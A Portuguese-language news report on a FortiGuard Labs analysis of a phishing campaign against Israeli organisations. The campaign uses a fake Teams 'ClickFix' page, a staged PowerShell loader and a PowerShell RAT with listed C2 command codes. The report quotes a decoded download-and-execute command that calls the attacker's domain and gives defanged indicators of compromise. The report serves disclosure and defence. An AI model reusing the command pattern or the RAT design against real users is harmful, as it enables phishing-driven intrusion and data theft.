Os agentes de ameaças iniciaram uma campanha geograficamente focada contra a infraestrutura israelense e entidades corporativas em uma sofisticada incursão cibernética descoberta pelo FortiGuard Labs da Fortinet.
Entregue exclusivamente por meio de sistemas Windows via scripts PowerShell, a cadeia de ataque permite o acesso remoto, facilitando o acesso remoto Exfiltração de dados, vigilância persistente e movimento lateral dentro de redes comprometidas.
Classificada como de alta gravidade, essa operação aproveita e-mails de phishing disfarçados de convites para sessões de mentoria sobre gerenciamento de suprimentos médicos em tempo de guerra, explorando sistemas de e-mail internos comprometidos para propagar iscas e aumentar as taxas de infecção.
O fluxo de ataque completo depende de um mecanismo de entrega baseado em PowerShell de vários estágios, evitando executáveis externos para evitar a detecção de antivírus tradicional, com cargas úteis buscadas de domínios controlados por atores, como pharmacynod[.]com.
Campanha de phishing atinge setores israelenses
O vetor de acesso inicial começa com e-mails de phishing pedindo aos destinatários que cliquem em links incorporados, redirecionando-os para uma interface falsificada do Microsoft Teams.
Essa página falsa emprega uma tática de engenharia social conhecida como “ClickFix”, instruindo os usuários a pressionar Windows + R para abrir a caixa de diálogo Executar, colar uma string copiada da área de transferência e executá-la de forma eficaz, mascarando o lançamento de um comando malicioso do PowerShell.
Incorporadas no HTML do site estão três strings codificadas em Base64 ofuscadas que, quando decodificadas, formam um comando como “powershell IEX ((Invoke-RestMethod -Uri hxxps://pharmacynod[.]com/Fix -Method GET).note.body)”, que recupera e executa um script secundário do servidor do invasor.
Esse carregador baixa arquivos como test.html para a pasta Public Downloads da vítima, contendo blobs codificados em binário separados por delimitadores como “kendrick”.
Um script de acompanhamento do PowerShell processa esses blobs dividindo, convertendo caracteres binários em ASCII e remontando-os em código executável, implantando um cavalo de Troia de acesso remoto (RAT) inteiramente no PowerShell.
Cargas ofuscadas
Análise mais profunda Revela o comportamento do carregador do RAT envolve o download de conteúdo ofuscado, incluindo strings Base64 compactadas descompactadas por meio de funções personalizadas para execução na memória.
Por exemplo, os scripts leem linhas específicas de test.html, extraem strings marcadas, dividem em delimitadores, executam conversões de binário para caractere (por exemplo, binário “1100110” é igual a decimal 102, mapeando para o caractere “f”) e invocam o código resultante com IEX.
Essa cadeia culmina em um RAT persistente que codifica seu servidor de comando e controle (C2) para pharmacynod[.]com, usando HTTPS para todas as comunicações.
Após a infecção, uma função “init” reúne detalhes da vítima, como domínio do Windows, nome do computador e nome de usuário, compacta-os e os reverte duas vezes com GZip e Base64 e, em seguida, registra-se por meio do endpoint /16625.
O RAT mantém a persistência por meio de um loop de sondagem infinito, dormindo por intervalos aleatórios (2 a 7 segundos) antes que o POST solicite a recuperação de comandos.
As respostas do C2 são compactadas, revertidas e prefixadas com códigos como 7979 para reinicialização, 5322 para downloads de conteúdo por meio de System.Net.WebClient, 4622 para ajustar intervalos de sondagem ou 2474 para execução arbitrária do PowerShell com saída exfiltrada para /17361.
As técnicas de evasão incluem ofuscação em camadas, GZip duplo, codificação Base64, reversão de cadeia de caracteres e substituições seguras de URL, combinadas com solicitações HTTP nativas do .NET que imitam o tráfego legítimo por meio de credenciais padrão, proxies e agentes de usuário definidos por meio de urlmon.dll.
A atribuição aponta para possíveis sobreposições com o MuddyWater, um grupo de ameaças conhecido, devido à segmentação regional, expansão lateral de ambientes comprometidos e táticas de script.
No entanto, desvios como evitar ferramentas de gerenciamento remoto e hosts de arquivos públicos, além do novo RAT totalmente PowerShell, sugerem uma possível evolução ou imitação por outro ator.
Esta campanha ressalta os riscos de ataques living-off-the-land, com proteções Fortinet, incluindo assinaturas antivírus como PowerShell/Agent.PH!tr, detecção de endpoint via FortiEDR e bloqueio de rede por meio de filtragem IPS e DNS para mitigar essas ameaças.
Indicadores de comprometimento
| COI | Descrição |
|---|---|
| hxxps://pharmacynod[.]com/ | C2 embutido em código |
| hxxps://pharmacynod[.]com/16625 | Registro / check-in de vítimas |
| hxxps://pharmacynod[.]com/17361 | Resultados do comando exfiltrado |
| 46a76b3c7851f30d68ebc6a5584bc099435b0544d8707fff7a9178f46046708b | SHA256 do PowerShell RAT |
Ache esta notícia interessante! Siga-nos noGoogle Notícias,LinkedIn, &Xpara obter atualizações instantâneas!